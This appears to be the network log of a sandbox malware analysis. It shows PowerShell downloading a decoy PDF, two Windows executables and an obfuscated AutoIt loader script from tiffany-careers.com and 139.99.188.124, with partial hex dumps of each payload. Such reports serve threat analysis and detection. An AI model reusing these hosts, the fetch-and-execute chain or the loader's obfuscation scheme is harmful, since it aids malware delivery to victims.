                                                                    Dec 18, 2024 09:13:14.859790087 CET1.1.1.1192.168.2.50xf3f8No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 18, 2024 09:13:25.674781084 CET1.1.1.1192.168.2.50x5207Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 09:13:41.925384045 CET1.1.1.1192.168.2.50xd9f7Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                    • tiffany-careers.com
                                                                    • 139.99.188.124
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549707147.45.49.155804308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 18, 2024 09:13:03.447788954 CET82OUTGET /Marketing.pdf HTTP/1.1
                                                                    Host: tiffany-careers.com
                                                                    Connection: Keep-Alive
                                                                    Dec 18, 2024 09:13:04.824548006 CET1236INHTTP/1.1 200 OK
                                                                    etag: "f92-675e8dca-2534b;;;"
                                                                    last-modified: Sun, 15 Dec 2024 08:05:30 GMT
                                                                    content-type: application/pdf
                                                                    content-length: 3986
                                                                    accept-ranges: bytes
                                                                    date: Wed, 18 Dec 2024 08:13:04 GMT
                                                                    server: LiteSpeed
                                                                    connection: Keep-Alive
                                                                    Data Raw: 25 50 44 46 2d 31 2e 33 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 50 61 72 65 6e 74 20 31 20 30 20 52 0a 2f 52 65 73 6f 75 72 63 65 73 20 32 20 30 20 52 0a 2f 43 6f 6e 74 65 6e 74 73 20 34 20 30 20 52 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 38 37 39 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 54 4d 93 d3 3a 10 bc f3 2b e6 08 55 fb 84 bf 3f f6 c6 2e 50 f5 de 2b aa 28 48 c1 85 8b 62 4f 12 b1 b6 14 24 25 a9 fc 7b 66 a4 38 4e c8 2e 27 c7 8e 46 dd d3 dd 33 19 fc f7 2a 11 65 0d 87 57 0f 0b 78 fb 31 85 b4 10 49 02 8b 15 7c 58 f0 a7 34 69 44 db 42 dd 96 22 ad 61 d1 c3 eb 2f 66 40 30 2b 90 1a de f5 7b b4 5e 39 a5 d7 f0 28 c7 ad 54 6b 0d 9f a4 96 6b b4 a0 34 48 78 34 f4 55 1f df c0 e2 e7 e9 c2 b7 1f 33 48 b3 19 23 11 55 d5 c2 22 e0 e7 a9 48 1b a8 f3 56 24 11 6b b1 c1 bf 83 48 4f 20 5d 04 81 ed 20 8f 8e df ad f2 aa 93 03 58 a6 4a 3c 0c dd e0 10 f9 06 a9 7b 18 b9 98 5e 26 56 c9 35 [TRUNCATED]
                                                                    Data Ascii: %PDF-1.33 0 obj<</Type /Page/Parent 1 0 R/Resources 2 0 R/Contents 4 0 R>>endobj4 0 obj<</Filter /FlateDecode /Length 879>>streamx}TM:+U?.P+(HbO$%{f8N.'F3*eWx1I|X4iDB"a/f@0+{^9(Tkk4Hx4U3H#U"HV$kHO ] XJ<{^&V5|:z:j27 n=QAai<H|#?]HW%Y{kCY)Xg>$vb+co),6E>>Rk~nI]kVGdBvRiOrE*)sylC${v\ ***\#a&pP~QG92WJ#tPf,]n)/a0<$a|&OY-N=R3M&Daj>!ZJGcycx7wdEj|E&XQ,J>)7%Z9uK7\u#FAlC@N^e]dM)8}|cV3.>Vufqrw-,HU]eh 48jc?Ltcfi${I"vRc[\v]^<MKQL+4vI\6 Ht.^n!O\>
                                                                    Dec 18, 2024 09:13:04.824580908 CET1236INData Raw: 1c 6f bd 2f 1b 51 57 27 eb c9 86 2e 0a 7e da 04 92 72 89 34 6d 97 3b 28 36 1b b0 7e 03 cf d2 4e 60 0a 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 35 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 50 61 72 65 6e 74 20 31
                                                                    Data Ascii: o/QW'.~r4m;(6~N`endstreamendobj5 0 obj<</Type /Page/Parent 1 0 R/Resources 2 0 R/Contents 6 0 R>>endobj6 0 obj<</Filter /FlateDecode /Length 872>>streamx}UKo8W{)][/5YK@Rv_3G$6^%$
                                                                    Dec 18, 2024 09:13:04.824606895 CET1236INData Raw: 92 94 5d ff 7d 87 94 17 39 76 0f 06 04 69 66 38 6f a3 13 f8 fe 10 b1 bc 84 fd c3 f3 0a be 7c 4b 20 4e 58 14 c1 aa 83 d7 95 7f 95 c6 2c ae a0 2c 4a 96 25 b0 6a e1 63 c5 e0 d9 70 d5 c2 4f ae f8 06 07 54 ee eb 27 58 bd f9 fa 98 a5 51 0d ab fd a2 31
                                                                    Data Ascii: ]}9vif8o|K NX,,J%jcpOT'XQ1YT!w(Gh0ru`aF&MqS(k4At}z2OJXZ2[hZvY0<cQzdk,0Ilgh?v.jI:
                                                                    Dec 18, 2024 09:13:04.824632883 CET529INData Raw: 46 50 44 46 20 31 2e 37 2e 32 20 68 74 74 70 3a 2f 2f 70 79 66 70 64 66 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 29 0a 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 20 28 44 3a 32 30 32 34 31 31 30 38 31 31 30 32 34 35 29 0a 3e 3e 0a 65 6e 64 6f
                                                                    Data Ascii: FPDF 1.7.2 http://pyfpdf.googlecode.com/)/CreationDate (D:20241108110245)>>endobj12 0 obj<</Type /Catalog/Pages 1 0 R/OpenAction [3 0 R /FitH null]/PageLayout /OneColumn>>endobjxref0 130000000000 65535 f 0000003020 00000 n 0000
                                                                    Dec 18, 2024 09:13:04.996354103 CET58OUTGET /PefjSkkhb.exe HTTP/1.1
                                                                    Host: tiffany-careers.com
                                                                    Dec 18, 2024 09:13:05.457967043 CET1236INHTTP/1.1 200 OK
                                                                    etag: "108a00-675eb102-2534d;;;"
                                                                    last-modified: Sun, 15 Dec 2024 10:35:46 GMT
                                                                    content-type: application/x-executable
                                                                    content-length: 1083904
                                                                    accept-ranges: bytes
                                                                    date: Wed, 18 Dec 2024 08:13:05 GMT
                                                                    server: LiteSpeed
                                                                    connection: Keep-Alive
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f 31 29 eb 2b 50 47 b8 2b 50 47 b8 2b 50 47 b8 9f cc b6 b8 3e 50 47 b8 9f cc b4 b8 b7 50 47 b8 9f cc b5 b8 0a 50 47 b8 b5 f0 80 b8 2a 50 47 b8 79 38 42 b9 05 50 47 b8 79 38 43 b9 3a 50 47 b8 79 38 44 b9 23 50 47 b8 22 28 c4 b8 23 50 47 b8 22 28 c0 b8 2a 50 47 b8 22 28 d4 b8 0e 50 47 b8 2b 50 46 b8 06 52 47 b8 8e 39 49 b9 7b 50 47 b8 8e 39 44 b9 2a 50 47 b8 8e 39 b8 b8 2a 50 47 b8 2b 50 d0 b8 2a 50 47 b8 8e 39 45 b9 2a 50 47 b8 52 69 63 68 2b 50 47 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 e4 af 5e 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 10 00 34 0b 00 00 52 [TRUNCATED]
                                                                    Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$o1)+PG+PG+PG>PGPGPG*PGy8BPGy8C:PGy8D#PG"(#PG"(*PG"(PG+PFRG9I{PG9D*PG9*PG+P*PG9E*PGRich+PGPEd^g"4RT@qR`@@\|@@HotPp(ppP8.text(34 `.rdataBPD8@@.data P|@.pdataHo@p@@.rsrc@B<@@.reloct~@B
                                                                    Dec 18, 2024 09:13:05.458029985 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 48 8d 0d e5 df 0e 00 e8 b0 4b 02 00 48 8d 0d f9 87 04 00 48 83 c4 28 e9
                                                                    Data Ascii: H(HKHH(>H>H(*HH(>H(fHH(>H(SnHH(>H(HHcPHzHhHH(^>H(\H
                                                                    Dec 18, 2024 09:13:05.458048105 CET1236INData Raw: 4c 3b c5 4c 0f 42 c5 4c 89 41 18 48 8d 4d f7 49 f7 e0 48 0f 40 c1 48 8b c8 e8 ac 37 02 00 48 8b 53 08 48 8b f8 48 85 d2 0f 85 56 84 04 00 48 89 7b 08 48 8b cd e8 54 37 02 00 48 8b 0e 48 8b 6c 24 38 48 8b 74 24 40 48 89 08 48 8b 53 10 48 8b 4b 08
                                                                    Data Ascii: L;LBLAHMIH@H7HSHHVH{HT7HHl$8Ht$@HHSHKHHCH\$0H _H\$DD$HL$UVWATAUAVAWHH0HIHUhEHgHHcAH-AHHL;HAtHMPS|yCU
                                                                    Dec 18, 2024 09:13:05.458106995 CET938INData Raw: eb b2 33 c0 eb bb 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 63 da 3b 1d 60 f4 0e 00 0f 84 fa 00 00 00 48 8b 0d 1b f4 0e 00 48 8b fb 48 8b 04 d9 48 8b 30 48 85 f6 74 3e 48 8d 8e d0 00 00 00 e8 28 fa 00 00 48 8d 8e a0 00 00 00 e8 b8 86 00 00
                                                                    Data Ascii: 3H\$Ht$WH Hc;`HHHH0Ht>H(HHNHHN(HA2HHH ;Lu |IH8uHH}HHvIDH8tH\$0Ht$8H _HHbI1
                                                                    Dec 18, 2024 09:13:05.458251953 CET1236INData Raw: 15 7f 3e 0b 00 8b 45 30 48 8d 55 30 89 87 90 02 00 00 48 8b cb 8b 45 34 89 87 94 02 00 00 ff 15 c0 3f 0b 00 48 8b 45 30 8b 4d 34 3b 87 98 02 00 00 0f 85 94 00 00 00 3b 8f 9c 02 00 00 0f 85 88 00 00 00 8b 4e 18 ff 15 a0 3e 0b 00 8b 4e 1c bb 00 80
                                                                    Data Ascii: >E0HU0HE4?HE0M4;;N>NDAfD#A>DfD#D;EtD;EtH\$hHt$pH|$xH0A_A^A]A\]AbHHXHp
                                                                    Dec 18, 2024 09:13:05.458267927 CET1236INData Raw: 84 e0 82 04 00 3c 0e 0f 84 64 83 04 00 3c 10 0f 84 03 84 04 00 3c 12 0f 84 b0 82 04 00 3c 14 0f 84 89 82 04 00 44 8a b4 24 a0 00 00 00 3c 18 0f 84 71 82 04 00 8b bc 24 b0 00 00 00 48 8b 44 24 50 ff c1 48 ff c0 89 8c 24 b8 00 00 00 49 83 c1 08 48
                                                                    Data Ascii: <d<<<D$<q$HD$PH$IHD$PILL$8HLD$@HHT$HI;K[$tEH`DT$0}E7Dl$(HADAD$EDd$ EE$HT$HLD$@LL$8D$
                                                                    Dec 18, 2024 09:13:05.466337919 CET1236INData Raw: 04 00 3c 17 74 7c 3c 18 74 0d 76 76 3c 1a 76 72 3c 1b 75 6e 41 8a ec 41 80 be ff 00 00 00 ff 0f 85 8e 81 04 00 41 8b 96 94 00 00 00 83 fa ff 75 0b 8d 4a 09 ff 15 1a 33 0b 00 8b d0 49 8b cf ff 15 37 2b 0b 00 40 84 ed 0f 84 29 82 04 00 41 8b d4 49
                                                                    Data Ascii: <t|<tvv<vr<unAAAuJ3I7+@)AI*/+H\$`Hl$hHt$pH0A_A^A]A\_@@SH HHt5HT7H;MsH<HHHtH9uH [H8LL$ MDHH8H\
                                                                    Dec 18, 2024 09:13:05.466406107 CET1236INData Raw: 00 04 00 44 0f 44 e1 45 33 ed 83 7d 78 ff 44 89 65 70 44 0f 45 6d 78 41 f6 c5 40 0f 85 54 81 04 00 83 7d 60 ff 41 bc 90 01 00 00 41 8b c4 0f 45 45 60 83 7d 68 ff 89 45 78 44 0f 45 65 68 83 7d 50 ff 75 37 33 d2 4c 8d 45 e0 45 33 c9 8d 4a 30 ff 15
                                                                    Data Ascii: DDE3}xDepDEmxA@T}`AAEE`}hExDEeh}Pu73LEE3J02.MA+MxM+AEPAuR3LEE3J02ANC.MA+M+ANEp@Dt.DDMxHME3Dd$ 31UpHME


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.549716139.99.188.124807812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 18, 2024 09:13:12.417023897 CET164OUTGET /kiiMf HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                    Host: 139.99.188.124
                                                                    Connection: Keep-Alive
                                                                    Dec 18, 2024 09:13:13.875879049 CET1236INHTTP/1.1 200 OK
                                                                    Date: Wed, 18 Dec 2024 08:13:12 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                    Last-Modified: Sun, 15 Dec 2024 10:29:42 GMT
                                                                    ETag: "da2a8-6294c8abc9816"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 893608
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 [TRUNCATED]
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDR*R*R*CP*S*_@a*_@*_@g*[j[*[jw*R+r**S*_@S*RP*S*RichR*PEL_pZ"@@@@|Ppq; [@.text `.rdata@@.datatR@.rsrcP<@@.relocqpr@B
                                                                    Dec 18, 2024 09:13:13.875905991 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 44 61 4c 00
                                                                    Data Ascii: DaLhC\YLhCKYNhC:YhC.Y<ChCYhCYQ>hCYsLQ@sLP9hCYGhC
                                                                    Dec 18, 2024 09:13:13.875917912 CET1236INData Raw: 46 04 59 83 24 b8 00 47 3b 7e 08 72 e7 ff 76 04 83 66 08 00 e8 bc fb 01 00 59 5f 5e c3 56 8b f1 57 8b 4e 78 85 c9 75 59 8b 46 7c 83 f8 0b 0f 8f 2a a4 03 00 0f 84 0a a4 03 00 83 e8 05 74 4e 83 e8 03 0f 84 df a3 03 00 48 48 0f 84 bd a3 03 00 83 66
                                                                    Data Ascii: FY$G;~rvfY_^VWNxuYF|*tNHHfpNTF|N$NV\Y_^QfxNptQ,SV3WN~^^^N$NT^4^8^<^@^D~H~L^P^d^h^p^x
                                                                    Dec 18, 2024 09:13:13.876049042 CET1236INData Raw: 89 45 f4 f7 d9 89 55 0c 89 4d 08 80 38 08 73 53 83 c2 08 40 89 45 f4 05 f0 f7 ff ff 03 c1 89 55 0c 3b 46 0c 8b 45 f4 7c e2 8b 46 0c 3b d8 74 1a 2b c3 50 8d 86 10 08 00 00 03 c3 50 8d 43 02 8d 04 c6 50 57 ff 15 24 01 49 00 8b 76 04 85 f6 75 8d ff
                                                                    Data Ascii: EUM8sS@EU;FE|F;t+PPCPW$IvuuW_^[];t +QPCPW$IEUMtDuLMtuWzME8tM@tEujPQWEUM#E
                                                                    Dec 18, 2024 09:13:13.876060963 CET1236INData Raw: 00 83 7e 4c ff 8b f8 74 03 8b 7e 4c 57 53 ff 15 40 01 49 00 6a 00 57 e8 55 08 00 00 eb 8f 8b c8 83 e9 4e 0f 84 aa 9e 03 00 83 e9 05 0f 84 90 9e 03 00 83 e9 28 0f 84 71 9e 03 00 83 e9 09 0f 84 52 9e 03 00 81 e9 8d 00 00 00 0f 84 30 9e 03 00 49 0f
                                                                    Data Ascii: ~Lt~LWS@IjWUN(qR0IIIDjUuuR+t#I4Iu-V&SVPWPVItIIhQQVCj~jwQHjUVW
                                                                    Dec 18, 2024 09:13:13.876071930 CET1120INData Raw: 0f 85 55 9c 03 00 5f 5e 5b 8b e5 5d c2 0c 00 8b 7d 0c 66 8b 46 58 80 bf 90 00 00 00 07 66 89 87 88 00 00 00 66 8b 46 5c 66 89 87 8a 00 00 00 74 5f 66 8b 46 60 66 89 87 8c 00 00 00 66 8b 46 64 66 89 87 8e 00 00 00 8d 45 dc 50 ff 37 ff 15 34 06 49
                                                                    Data Ascii: U_^[]}fFXffF\ft_fF`ffFdfEP74I9^Xt=9^\tEEP7I9^`9^d{}tfEffEfUwLMEtAXEtA\E~A`E~Ad]
                                                                    Dec 18, 2024 09:13:13.876082897 CET1236INData Raw: 8b 35 f0 05 49 00 ff d6 ff 73 1c 0f b7 c0 c1 e8 0f 89 45 08 ff d6 0f b7 f0 8b 45 08 c1 ee 0f 3b 87 7c 01 00 00 0f 85 61 9b 03 00 83 7d 0c 00 74 06 89 87 7c 01 00 00 3b b7 80 01 00 00 0f 85 b5 9b 03 00 83 7d 0c 00 74 06 89 b7 80 01 00 00 5f 5e 5b
                                                                    Data Ascii: 5IsEE;|a}t|;}t_^[]}tx|UMVW|P;HBtt<u@MB`8t"|;Bt8t_^]2UVW};Ft
                                                                    Dec 18, 2024 09:13:13.876095057 CET1236INData Raw: c3 00 00 04 00 0f 85 d2 01 00 00 8b 45 20 40 f7 d8 1b c0 23 45 20 89 45 1c a8 40 0f 85 cb 97 03 00 8b 45 10 89 45 20 8b 45 0c 89 45 0c 83 7d 14 ff b9 90 01 00 00 0f 84 a8 01 00 00 83 7d 18 ff 0f 84 a6 01 00 00 83 f8 ff 75 2d 6a 00 8d 45 e8 50 6a
                                                                    Data Ascii: E @#E E@EE EE}}u-jEPjj0@IjXIM+MM++E} uFjEPjj0@IjXIM+MM++E @tjXIjYE uEujjPIuEjSPIE+Ej5
                                                                    Dec 18, 2024 09:13:13.876430988 CET1236INData Raw: f8 0f 0f 8e 8f 9b 03 00 83 f8 11 0f 84 86 9b 03 00 83 f8 14 0f 84 7d 9b 03 00 83 fe ff 0f 84 87 01 00 00 a1 10 78 4c 00 8b 04 b0 8b 18 53 89 5d e4 e8 a8 f7 ff ff 8b f8 89 7d e0 83 ff ff 0f 84 66 01 00 00 a1 24 78 4c 00 8b 55 08 8b 04 b8 8b 30 89
                                                                    Data Ascii: }xLS]}f$xLU0ui`WPfwLfUEM}UU(EM}U(SuWQP{`CXK\}{dEM}U}E$2@u$u u
                                                                    Dec 18, 2024 09:13:13.876442909 CET1236INData Raw: c0 74 0c 33 c0 40 5b 5f 5e 8b e5 5d c2 04 00 8b 4d fc 46 3b 75 08 72 c4 33 c0 eb ea 33 c0 eb e7 56 8b f1 8b 0e 85 c9 7e 1d 8b d1 0f b6 c1 c1 fa 10 81 e1 00 ff 00 00 81 e2 ff 00 00 00 c1 e0 10 0b d0 0b d1 89 16 5e c3 55 8b ec 83 ec 0c 53 56 8b c1
                                                                    Data Ascii: t3@[_^]MF;ur33V~^USVWPE&3fCY3x!MM9M~Fj0Zx?Ex9wAf;r<+QSRPd+MVOEj0@MEZ;E|u _^[]AF7&f2V
                                                                    Dec 18, 2024 09:13:13.996063948 CET1236INData Raw: a5 d5 01 00 8b 45 f8 59 89 46 04 c6 46 09 00 5b ff 0e 5f 5e 8b e5 5d c3 ff 77 1c 8b cb e8 5c 00 00 00 eb ac c6 46 09 01 eb e6 55 8b ec 56 57 8b f9 80 7f 09 00 0f 85 df 98 03 00 6a 0c e8 f1 d4 01 00 8b f0 59 85 f6 74 31 8b 45 08 83 26 00 8b 48 04
                                                                    Data Ascii: EYFF[_^]w\FUVWjYt1E&HNx0VGFw_^]f3UVuWtT~tv~uF~u~t)WYFF8u6vYYVY_^]vU


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.549729139.99.188.124807480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 18, 2024 09:13:19.053615093 CET76OUTGET /QWCheljD.txt HTTP/1.1
                                                                    Host: 139.99.188.124
                                                                    Connection: Keep-Alive
                                                                    Dec 18, 2024 09:13:20.553158998 CET1236INHTTP/1.1 200 OK
                                                                    Date: Wed, 18 Dec 2024 08:13:18 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                    Last-Modified: Sun, 15 Dec 2024 10:29:42 GMT
                                                                    ETag: "12ec22-6294c8abc8478"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 1240098
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: text/plain
                                                                    Data Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24 4f 64 48 42 74 20 3d 20 32 38 20 54 6f 20 38 36 35 0a 49 66 20 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 32 20 54 68 65 6e 0a 53 71 72 74 28 37 39 35 35 29 0a 46 69 6c 65 45 78 69 73 74 73 28 [TRUNCATED]
                                                                    Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $OdHBt = 28 To 865If $VerifiedUnderstoodValidation = 32 ThenSqrt(7955)FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUnderstoodValidation = 33 ThenConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5))DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2))Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUndersto
                                                                    Dec 18, 2024 09:13:20.553169966 CET1236INData Raw: 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 20 54 68 65 6e 0a 24 4e 75 74 74 65 6e 49 6e 76 65 73 74 6f 72 73 52 61 6c 65 69 67 68 20 3d 20 44 65 63 28 57 61 6c 65 73 28 22 31 30 34 5d 31 31 33 5d 31 30 35 5d 38 36 5d 38 35 5d 39 36 5d 38
                                                                    Data Ascii: odValidation = 34 Then$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]83]73]78]127]105]97]79]105]77",28/4))ExitLoopEndIfNext$LAYERSSTRICTINNOVATIVE = '66150718350940696046327902621'$DmModsQueries = 68$DRESSDEARANTIQUES = 93Wh
                                                                    Dec 18, 2024 09:13:20.553184032 CET1236INData Raw: 6c 4c 69 62 72 61 72 69 61 6e 53 70 69 72 69 74 55 20 3d 20 24 54 68 65 6f 72 65 74 69 63 61 6c 4c 69 62 72 61 72 69 61 6e 53 70 69 72 69 74 55 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 54 68 65 6f 72 65 74 69 63 61 6c 4c 69 62 72 61 72 69 61
                                                                    Data Ascii: lLibrarianSpiritU = $TheoreticalLibrarianSpiritU + 1EndIfIf $TheoreticalLibrarianSpiritU = 18 Then$locateheadquarterssuccessfully = PixelGetColor(Wales("82]124]123]88]85]72]105]73]102]127]126]82]119",5/1), Wales("82]124]123]88]85]72]105]73]
                                                                    Dec 18, 2024 09:13:20.553282022 CET672INData Raw: 37 29 29 0a 41 53 69 6e 28 39 39 32 29 0a 24 6d 69 73 73 69 6f 6e 73 67 72 65 65 6e 68 6f 75 73 65 20 3d 20 24 6d 69 73 73 69 6f 6e 73 67 72 65 65 6e 68 6f 75 73 65 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 6d 69 73 73 69 6f 6e 73 67 72 65 65
                                                                    Data Ascii: 7))ASin(992)$missionsgreenhouse = $missionsgreenhouse + 1EndIfIf $missionsgreenhouse = 96 Then$broughtisnicholasearned = ASin(9631)ExitLoopEndIfIf $missionsgreenhouse = 97 ThenDriveStatus(Wales("87]120]118]101]109]107]108]120]39",24/6
                                                                    Dec 18, 2024 09:13:20.553292036 CET1236INData Raw: 73 74 72 65 61 73 75 72 79 20 3d 20 37 38 0a 46 6f 72 20 24 55 52 44 48 45 47 77 47 45 20 3d 20 39 20 54 6f 20 38 34 39 0a 49 66 20 24 53 43 41 4c 45 53 57 58 45 54 48 4e 49 43 4f 4d 41 48 41 20 3d 20 37 37 20 54 68 65 6e 0a 41 43 6f 73 28 37 37
                                                                    Data Ascii: streasury = 78For $URDHEGwGE = 9 To 849If $SCALESWXETHNICOMAHA = 77 ThenACos(7716)Sqrt(1841)ConsoleWriteError(Wales("119]106]120]122]114]106]37",10/2))$SCALESWXETHNICOMAHA = $SCALESWXETHNICOMAHA + 1EndIfIf $SCALESWXETHNICOMAHA = 78 The
                                                                    Dec 18, 2024 09:13:20.553328991 CET1236INData Raw: 6c 6f 72 28 57 61 6c 65 73 28 22 31 32 38 5d 31 30 38 5d 31 30 34 5d 35 34 5d 31 31 32 5d 31 31 37 5d 31 30 36 5d 31 31 32 5d 31 30 37 5d 31 30 38 5d 31 31 37 5d 31 30 36 5d 31 30 38 5d 35 34 22 2c 32 31 2f 33 29 2c 20 57 61 6c 65 73 28 22 31 32
                                                                    Data Ascii: lor(Wales("128]108]104]54]112]117]106]112]107]108]117]106]108]54",21/3), Wales("128]108]104]54]112]117]106]112]107]108]117]106]108]54",21/3))PixelGetColor(99, 153, 0)$DILDOSYIELDSFAREADDRESSED = $DILDOSYIELDSFAREADDRESSED + 1EndIfNext$hum
